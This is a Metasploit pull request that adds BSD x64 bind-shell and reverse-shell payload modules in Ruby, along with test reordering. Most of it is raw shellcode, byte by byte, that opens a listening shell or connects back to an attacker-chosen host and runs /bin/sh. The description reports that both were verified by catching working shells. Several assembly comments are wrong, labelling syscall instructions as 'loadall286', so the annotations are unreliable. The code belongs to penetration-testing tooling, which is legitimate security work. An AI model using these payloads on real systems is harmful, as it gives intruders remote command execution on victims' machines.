### PR TITLE
Implement shell_bind and shell_reverse payloads for bsd x64

### DIFF
--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb
@@ -1,0 +1,100 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Metasploit3
+
+  CachedSize = 136
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Shell Bind TCP',
+      'Description'   => 'Bind an arbitrary command to an arbitrary port',
+      'Author'        => [
+        'nemo <nemo[at]felinemenace.org>',
+        'joev'
+      ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix
+    ))
+
+    # exec payload options
+    register_options(
+      [
+        OptString.new('CMD',  [ true,  "The command string to execute", "/bin/sh" ]),
+        Opt::LPORT(4444)
+    ], self.class)
+  end
+
+  # build the shellcode payload dynamically based on the user-provided CMD
+  def generate
+    cmd  = (datastore['CMD'] || '') << "\x00"
+    port = [datastore['LPORT'].to_i].pack('n')
+    call = "\xe8" + [cmd.length].pack('V')
+    payload =
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x61" +             # add eax,0x61
+      "\x6A\x02" +                 # push byte 0x1
+      "\x5f" +                     # pop rdi
+      "\x6A\x01" +                 # push byte 0x1
+      "\x5e" +                     # pop rsi
+      "\x48\x31\xD2" +             # xor rdx,rdx
+      "\x0F\x05" +                 # loadall286
+      "\x48\x89\xC7" +             # mov rdi,rax
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x68" +             # add eax,0x68
+      "\x48\x31\xF6" +             # xor rsi,rsi
+      "\x56" +                     # push rsi
+      "\xBE\x00\x02" + port +      # mov esi,0xb3150200
+      "\x56" +                     # push rsi
+      "\x48\x89\xE6" +             # mov rsi,rsp
+      "\x6A\x10" +                 # push 0x10
+      "\x5A" +                     # pop rdx
+      "\x0F\x05" +                 # loadall286
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x6A" +             # add eax,0x6a
+      "\x48\x31\xF6" +             # xor rsi,rsi
+      "\x48\xFF\xC6" +             # inc rsi
+      "\x49\x89\xFC" +             # mov r12,rdi
+      "\x0F\x05" +                 # loadall286
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x1E" +             # add eax,0x1e
+      "\x4C\x89\xE7" +             # mov rdi,r12
+      "\x48\x89\xE6" +             # mov rsi,rsp
+      "\x48\x89\xE2" +             # mov rdx,rsp
+      "\x48\x83\xEA\x04" +         # sub rdx,byte +0x4
+      "\x0F\x05" +                 # loadall286
+      "\x48\x89\xC7" +             # mov rdi,rax
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x5A" +             # add eax,0x5a
+      "\x48\x31\xF6" +             # xor rsi,rsi
+      "\x0F\x05" +                 # loadall286
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x5A" +             # add eax,0x5a
+      "\x48\xFF\xC6" +             # inc rsi
+      "\x0F\x05" +                 # loadall286
+      "\x48\x31\xC0" +             # xor rax,rax
+      "\x31\xc0" +                 # xor eax,eax
+      "\x83\xc0\x3b" +             # add eax,0x3b
+      call +                       # call CMD.len
+      cmd +                        # CMD
+      "\x48\x8b\x3c\x24" +         # mov rdi, [rsp]
+      "\x48\x31\xD2" +             # xor rdx,rdx
+      "\x52" +                     # push rdx
+      "\x57" +                     # push rdi
+      "\x48\x89\xE6" +             # mov rsi,rsp
+      "\x0F\x05"                   # loadall286
+  end
+end

--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
@@ -1,0 +1,100 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+module Metasploit3
+
+  CachedSize = 108
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Shell Reverse TCP',
+      'Description'   => 'Connect back to attacker and spawn a command shell',
+      'Author'        => [
+        'nemo <nemo[at]felinemenace.org>',
+        'joev' # copy pasta monkey
+      ],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix
+    ))
+
+    # exec payload options
+
+    register_options(
+      [
+        OptString.new('CMD',   [ true,  "The command string to execute", "/bin/sh" ]),
+        Opt::LHOST,
+        Opt::LPORT(4444)
+    ], self.class)
+  end
+
+  # build the shellcode payload dynamically based on the user-provided CMD
+  def generate
+    lhost = datastore['LHOST'] || '127.0.0.1'
+
+    # OptAddress allows either an IP or hostname, we only want IPv4
+    if not Rex::Socket.is_ipv4?(lhost)
+      raise ArgumentError, "LHOST must be in IPv4 format."
+    end
+
+    cmd  = (datastore['CMD'] || '') << "\x00"
+    port = [datastore['LPORT'].to_i].pack('n')
+    ipaddr = [lhost.split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")
+
+    call = "\xe8" + [cmd.length].pack('V')
+    payload =
+      "\x31\xc0" +                                 # xor eax,eax
+      "\x83\xc0\x61" +                             # add eax,0x61
+      "\x6A\x02" +                                 # push byte +0x2
+      "\x5F" +                                     # pop rdi
+      "\x6A\x01" +                                 # push byte +0x1
+      "\x5E" +                                     # pop rsi
+      "\x48\x31\xD2" +                             # xor rdx,rdx
+      "\x0F\x05" +                                 # loadall286
+      "\x49\x89\xC4" +                             # mov r12,rax
+      "\x48\x89\xC7" +                             # mov rdi,rax
+      "\x31\xc0" +                                 # xor eax,eax
+      "\x83\xc0\x62" +                             # add eax,0x62
+      "\x48\x31\xF6" +                             # xor rsi,rsi
+      "\x56" +                                     # push rsi
+      "\x48\xBE\x00\x02" + port +                  # mov rsi,0x100007fb3150200
+      ipaddr +
+      "\x56" +                                     # push rsi
+      "\x48\x89\xE6" +                             # mov rsi,rsp
+      "\x6A\x10" +                                 # push byte +0x10
+      "\x5A" +                                     # pop rdx
+      "\x0F\x05" +                                 # loadall286
+      "\x4C\x89\xE7" +                             # mov rdi,r12
+      "\x31\xc0" +                                 # xor eax,eax
+      "\x83\xc0\x5A" +                             # add eax,0x5a
+      "\x48\x31\xF6" +                             # xor rsi,rsi
+      "\x0F\x05" +                                 # loadall286
+      "\x31\xc0" +                                 # xor eax,eax
+      "\x83\xc0\x5A" +                             # add eax,0x5a
+      "\x48\xFF\xC6" +                             # inc rsi
+      "\x0F\x05" +                                 # loadall286
+      "\x48\x31\xC0" +                             # xor rax,rax
+      "\x31\xc0" +                                 # xor eax,eax
+      "\x83\xc0\x3B" +                             # add eax,0x3b
+      call +                                       # call CMD.len
+      cmd +                                        # CMD
+      "\x48\x8B\x3C\x24" +                         # mov rdi,[rsp]
+      "\x48\x31\xD2" +                             # xor rdx,rdx
+      "\x52" +                                     # push rdx
+      "\x57" +                                     # push rdi
+      "\x48\x89\xE6" +                             # mov rsi,rsp
+      "\x0F\x05"                                   # loadall286
+  end
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -286,16 +286,6 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/exec'
   end
 
-  context 'bsd/x64/shell_reverse_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_tcp'
-  end
-
   context 'bsd/x64/shell_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -304,6 +294,16 @@ describe 'modules/payloads', :content do
                           dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'bsd/x64/shell_bind_tcp'
+  end
+
+  context 'bsd/x64/shell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp'
   end
 
   context 'bsdi/x86/shell/bind_tcp' do

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -286,6 +286,26 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/exec'
   end
 
+  context 'bsd/x64/shell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp'
+  end
+
+  context 'bsd/x64/shell_bind_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp'
+  end
+
   context 'bsdi/x86/shell/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
Last bsd ticket, I promise. I've ported the OSX x64 reverse_ and bind_tcp payloads over to bsd x64. The port just involved replacing the syscall number.
##### Verification
- [x] Generate a bsd x64 shell_bind_tcp payload, ensure you can catch a shell from it and the shell functions properly
- [x] Generate a bsd x64 shell_reverse_tcp payload, ensure you can catch a shell from it and the shell functions properly
